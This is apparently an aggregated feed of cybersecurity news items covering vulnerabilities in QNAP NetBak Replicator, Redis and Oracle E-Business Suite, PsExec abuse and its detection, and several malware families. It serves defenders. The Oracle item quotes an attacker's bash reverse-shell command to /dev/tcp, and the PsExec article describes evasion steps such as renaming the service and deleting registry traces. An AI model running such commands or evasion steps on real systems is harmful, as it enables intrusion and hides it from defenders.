• QNAP has released a security advisory detailing a vulnerability in its NetBak Replicator utility that could allow local attackers to execute unauthorized code.

    The flaw, identified as CVE-2025-57714, has been rated as “Important” and affects specific versions of the backup and restore software. The company has already issued a patch and is urging users to update their systems to prevent potential exploitation.

    This vulnerability stems from an unquoted search path or element within the NetBak Replicator software. This type of flaw occurs when the path to an executable file is not properly enclosed in quotation marks.

    If a local attacker has already gained access to a user account on the system, they can place a malicious executable in a parent directory of the legitimate program’s path.

    The operating system may then inadvertently execute the malicious file instead of the intended one, leading to unauthorized code execution with the permissions of the running application.

    Affected Products

    The vulnerability specifically impacts NetBak Replicator versions 4.5.x. According to the advisory released on October 4, 2025, a successful exploit requires an attacker to have prior access to a local user account.

    From there, they can leverage the unquoted search path to execute arbitrary commands or code. This could allow the attacker to escalate privileges, install persistent malware, or manipulate data on the compromised system.

    While the attack requires local access, it represents a significant risk in multi-user environments or as a post-exploitation technique for privilege escalation.

    CVE IDAffected Product(s)ImpactPrerequisitesCVSS 3.1 Score
    CVE-2025-57714NetBak Replicator 4.5.xUnauthorized code executionLocal attacker with user account accessNot Publicly Disclosed

    Mitigations

    QNAP has addressed the security flaw in NetBak Replicator version 4.5.15.0807 and all subsequent releases.

    The company strongly recommends that all users of the affected software versions update to the latest patched version immediately to protect their devices from potential attacks.

    Users can find the latest software updates by visiting the official QNAP Utilities webpage. Regularly updating software is a critical security practice that ensures systems are protected against newly discovered vulnerabilities and threats. The discovery of this vulnerability was credited to Kazuma Matsumoto of GMO Cybersecurity by IERAE, Inc.

    Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.

    The post QNAP NetBak Replicator Vulnerability Let Attackers Execute Unauthorized Code appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • A critical security vulnerability has been discovered in Redis Server that could allow authenticated attackers to achieve remote code execution through a use-after-free flaw in the Lua scripting engine. The vulnerability, tracked as CVE-2025-49844, affects all versions of Redis that support Lua scripting functionality. Critical Memory Corruption Flaw Discovered Security researchers from Wiz, including Benny […]

    The post Redis Server Use-After-Free Vulnerability Allows Remote Code Execution appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • PsExec represents one of the most contradictory tools in the cybersecurity landscape, a legitimate system administration utility that has become a cornerstone of malicious lateral movement campaigns.

    Recent threat intelligence reports indicate that PsExec remains among the top five tools used in cyberattacks as of 2025, with ransomware groups like Medusa, LockBit, and Kasseika actively leveraging it for network propagation.

    This persistent abuse underscores the critical need for security professionals to understand both the technical mechanics of PsExec and the sophisticated ways threat actors exploit its capabilities.

    PsExec operates through a sophisticated multi-stage process that leverages core Windows protocols and services.

    When executed legitimately, PsExec creates a temporary service on the target machine called PSEXESVC, which acts as a conduit for remote command execution.

    The tool begins by authenticating to the target system via the SMB (Server Message Block) protocol, then connects to the ADMIN$ administrative share, which maps directly to the C:\Windows directory.

    The authentication process utilizes either current logon credentials or explicitly provided username and password combinations.

    Upon successful authentication, PsExec establishes a DCE/RPC (Distributed Computing Environment/Remote Procedure Call) connection to the target’s Service Control Manager (SCM) through the svcctl named pipe.

    This connection enables PsExec to create and manage services remotely, providing the foundation for its remote execution capabilities.

    The service creation process involves uploading the PSEXESVC.exe binary to the target’s ADMIN$ share, then registering it as a Windows service through the SCM interface.

    Once installed, the service creates named pipes for communication, typically psexecsvc for standard input/output, with additional pipes for stdin, stdout, and stderr.

    These pipes facilitate full-duplex communication between the local and remote systems, enabling interactive command execution.

    Attack Vectors And Malicious Exploitation

    Threat actors have weaponized PsExec’s legitimate functionality to achieve multiple malicious objectives within compromised networks.

    The 2025 CyberProof Mid-Year Threat Landscape Report identifies PsExec as one of the top five tools used in attacks, highlighting its continued relevance in modern threat campaigns.

    Attackers primarily exploit PsExec for lateral movement after obtaining valid administrative credentials through various means, including credential dumping, password spraying, or exploiting stored credentials.

    The lateral movement process typically follows a predictable pattern. Attackers first compromise an initial system and harvest credentials with local administrator privileges on target machines.

    They then use PsExec to execute commands remotely, often deploying additional malware, creating backdoors, or establishing persistence mechanisms.

    The tool’s ability to run commands with SYSTEM-level privileges makes it particularly attractive for disabling security controls and deploying ransomware payloads.

    Recent ransomware campaigns demonstrate sophisticated PsExec abuse patterns. The Medusa ransomware group uses PsExec with the -c flag to copy batch scripts to remote machines and execute them with SYSTEM privileges.

    These scripts often disable Windows Defender, create firewall rules to allow remote desktop connections, and modify registry settings to facilitate persistent access.

    Similarly, LockBit affiliates have been observed using PsExec to remotely edit boot configuration data registry entries related to hypervisors, specifically targeting VMware ESXi environments.

    Detection Artifacts And Forensic Analysis

    PsExec execution generates numerous forensic artifacts that security teams can monitor to detect malicious activity. The most reliable indicator is Windows Event ID 7045, which records service installation events in the System log.

    When PsExec creates the PSEXESVC service, this event captures the service name, executable path, and account context, providing clear evidence of remote execution attempts.

    PsExec Detection Artifacts and Their Forensic Value for Security Teams

    Network-based detection opportunities center on SMB traffic analysis and named pipe monitoring. Security Event ID 5145 logs network share access, including connections to the ADMIN$ share that PsExec requires for file uploads.

    The creation of named pipes with patterns like “-stdin,” “-stdout,” and “*-stderr” provides additional detection signals, particularly when these pipes appear without corresponding legitimate PSEXESVC service entries.

    Advanced detection approaches focus on behavioral analysis rather than signature-based methods.

    The combination of SMB authentication (Event ID 4624), service creation (Event ID 7045), and named pipe activity within short time windows creates high-confidence indicators of PsExec usage.

    Organizations with robust logging can correlate these events with process creation monitoring (Sysmon Event ID 1) to build comprehensive attack timelines.

    Evasion Techniques And Variants

    Sophisticated threat actors employ various techniques to evade detection while maintaining PsExec’s functionality. Service name customization represents the most common evasion method, using the -r parameter to specify alternative service names instead of the default PSEXESVC.

    This simple modification can bypass detection rules that rely solely on service name matching, requiring defenders to implement more sophisticated behavioral detection logic.

    Custom PsExec implementations further complicate detection efforts. Tools like Impacket provide PsExec-style functionality with configurable service names, pipe names, and communication protocols.

    These alternatives follow similar operational patterns but use different artifacts, requiring detection rules that focus on behavioral indicators rather than specific tool signatures.

    Registry manipulation presents another evasion avenue. Attackers can delete the EulaAccepted registry key that PsExec creates upon first use, eliminating forensic evidence on source systems.

    Some groups employ custom-compiled versions that bypass the EULA acceptance requirement entirely, further reducing their forensic footprint.

    Real-World Attack Campaigns

    Contemporary threat groups demonstrate sophisticated PsExec integration within broader attack chains.

    The Kasseika ransomware group combines PsExec with Bring Your Own Vulnerable Driver (BYOVD) attacks, using PsExec to deploy malicious batch files that load vulnerable drivers for antivirus evasion.

    This multi-stage approach showcases how modern attackers layer multiple techniques to achieve their objectives while evading detection.

    BlackSuit ransomware operators utilize PsExec alongside PowerShell, Cobalt Strike, and Mimikatz to establish comprehensive network control.

    Their campaigns demonstrate PsExec’s role in rapid network enumeration and payload deployment, with attackers using the tool to execute reconnaissance scripts and deploy encryption payloads across multiple systems simultaneously.

    Intelligence reports indicate that PsExec abuse continues evolving, with threat actors adapting their techniques to bypass emerging detection capabilities.

    The tool’s legitimate status and widespread deployment in enterprise environments ensure its continued relevance in attack scenarios.

    Mitigation Strategies

    Effective PsExec abuse prevention requires layered security controls addressing both technical and procedural aspects. Network segmentation represents the foundational defense, limiting lateral movement opportunities even when attackers obtain valid credentials.

    Organizations should implement strict firewall rules controlling SMB traffic between network segments and monitoring administrative share access.

    Credential hygiene practices significantly reduce PsExec abuse potential. Implementing least-privilege principles, regular password rotations, and privileged access management (PAM) solutions limits the administrative credentials available to attackers.

    Organizations should particularly focus on protecting service accounts and shared administrative credentials that often provide widespread network access.

    Detection engineering requires comprehensive logging and monitoring capabilities. Security teams should implement alerts for Event ID 7045 service installations, particularly those with unusual service names or executable paths.

    Named pipe monitoring through Event ID 5145 provides additional detection opportunities, especially when combined with SMB connection analysis.

    Advanced defensive measures include application whitelisting, endpoint detection and response (EDR) deployment, and behavioral analysis platforms. These technologies can identify PsExec abuse through pattern recognition and anomaly detection, even when attackers employ evasion techniques.

    Regular threat hunting exercises focusing on lateral movement indicators help organizations identify sophisticated attacks that bypass automated detection systems.

    The persistent abuse of PsExec in modern attack campaigns demonstrates the ongoing challenge of securing legitimate administrative tools.

    As threat actors continue refining their techniques, security teams must maintain vigilance through comprehensive monitoring, robust detection capabilities, and proactive threat hunting practices.

    Understanding PsExec’s technical mechanics and attack patterns enables defenders to implement effective countermeasures while preserving the tool’s legitimate administrative value.

    Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.

    The post How Windows Command-line Utility PsExec Can Be Abused To Execute Malicious Code appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • SpyCloud Labs analysts have successfully reverse-engineered Asgard Protector, a sophisticated crypter tool prominently used to hide malicious payloads from antivirus detection systems. This crypter has gained particular notoriety for being the preferred choice among sellers of LummaC2, currently the most prevalent commodity infostealer in the cyberthreat landscape. The analysis reveals intricate evasion techniques that demonstrate the evolving […]

    The post Asgard Malware Protector Reversed: Researchers Expose Its Antivirus Bypass Methods appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • QNAP Systems has disclosed a critical security vulnerability in its NetBak Replicator software that could enable local attackers to execute malicious code on affected systems. The vulnerability, tracked as CVE-2025-57714, stems from an unquoted search path element flaw that poses significant security risks to organizations using the backup solution. Vulnerability Details and Impact Assessment The […]

    The post QNAP NetBak Replicator Vulnerability Allow Malicious Code Execution appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • A critical zero-day vulnerability in Oracle E-Business Suite has emerged as a significant threat to enterprise environments, with proof-of-concept (PoC) exploit code now publicly available. 

    CVE-2025-61882 presents a severe security risk, achieving a maximum CVSS 3.1 score of 9.8 and enabling remote code execution without authentication across multiple Oracle E-Business Suite versions.

    The vulnerability affects Oracle E-Business Suite versions 12.2.3 through 12.2.14, specifically targeting the Oracle Concurrent Processing BI Publisher Integration component via the HTTP protocol. 

    Oracle E-Business Suite RCE Vulnerability

    Security researchers have identified a flaw that allows unauthenticated remote attackers to execute arbitrary code on vulnerable systems through network-based exploitation with low attack complexity.

    Oracle’s security advisory emphasizes the vulnerability’s classification as “remotely exploitable without authentication,” meaning attackers can leverage network access without requiring valid credentials. 

    The vulnerability’s attack vector utilizes HTTP communications, with the scope remaining unchanged but delivering high impact across confidentiality, integrity, and availability metrics. 

    Organizations can detect vulnerable instances using Nuclei detection templates that check for “E-Business Suite Home Page” text while comparing Last-Modified header timestamps against October 4, 2025. 

    The Oracle October 2023 Critical Patch Update serves as a prerequisite for applying the necessary security patches. Systems with modification dates preceding this threshold indicate unpatched installations susceptible to exploitation.

    Risk FactorsDetails
    Affected ProductsOracle E-Business Suite 12.2.3-12.2.14
    ImpactRemote Code Execution
    Exploit PrerequisitesNetwork access via HTTP protocol, No authentication required
    CVSS 3.1 Score9.8 (Critical)

    Active Exploitation

    Active exploitation attempts have been documented through specific Indicators of Compromise (IOCs), including malicious IP addresses 200[.]107[.]207[.]26 and 185[.]181[.]60[.]11 conducting GET and POST activities. 

    Threat actors are utilizing reverse shell commands such as sh -c /bin/bash -i >& /dev/tcp// 0>&1 to establish outbound TCP connections for persistent access.

    Forensic analysis reveals malicious artifacts including the exploitation toolkit oracle_ebs_nday_exploit_poc_scattered_lapsus_retard_cl0p_hunters.zip (SHA-256: 76b6d36e04e367a2334c445b51e1ecce97e4c614e88dfb4f72b104ca0f31235d) containing Python exploitation scripts exp.py and server.py. 

    These tools demonstrate sophisticated attack methodologies potentially linked to known threat groups, including references to Scattered Spider, Lapsus$, and Cl0p ransomware operations.

    Oracle strongly recommends the immediate deployment of patches across all affected E-Business Suite installations, emphasizing that only systems under Premier Support or Extended Support receive security updates. 

    Organizations should implement network monitoring for the identified IOCs while conducting comprehensive vulnerability assessments using available detection templates and Shodan queries targeting html:”OA_HTML” patterns to identify exposed instances.

    Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.

    The post PoC Exploit Released for Remotely Exploitable Oracle E-Business Suite 0-Day Vulnerability appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Red team researchers have unveiled XRayC2, a sophisticated command-and-control framework that weaponizes Amazon Web Services’ X-Ray distributed application tracing service to establish covert communication channels. This innovative technique demonstrates how attackers can abuse legitimate cloud monitoring infrastructure to bypass traditional network security controls. Diagram explaining command and control (C2) servers used by attackers to control […]

    The post Hackers Turn AWS X-Ray into Command-and-Control Platform appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • A now patched security vulnerability in Zimbra Collaboration was exploited as a zero-day earlier this year in cyber attacks targeting the Brazilian military. Tracked as CVE-2025-27915 (CVSS score: 5.4), the vulnerability is a stored cross-site scripting (XSS) vulnerability in the Classic Web Client that arises as a result of insufficient sanitization of HTML content in ICS calendar files,

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • The cybersecurity landscape continues to evolve as threat actors behind the WARMCOOKIE backdoor malware have significantly enhanced their capabilities, introducing new features and maintaining active development despite law enforcement disruptions. The latest WARMCOOKIE variants demonstrate the threat actors’ commitment to expanding their operational toolkit. Four new command handlers have been integrated into the malware’s architecture […]

    The post WARMCOOKIE Malware Operators Introduce Advanced Capabilities appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Oracle has issued an urgent security alert for a critical zero-day vulnerability affecting Oracle E-Business Suite that allows remote code execution without authentication. The vulnerability, tracked as CVE-2025-61882, has now received public proof-of-concept detection capabilities from cybersecurity researcher rxerium. Illustration showing a hacker and icons representing cyber threats with a caption about the $10.5 trillion economic […]

    The post PoC Released for Remotely Exploitable Oracle E-Business Suite 0-Day appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶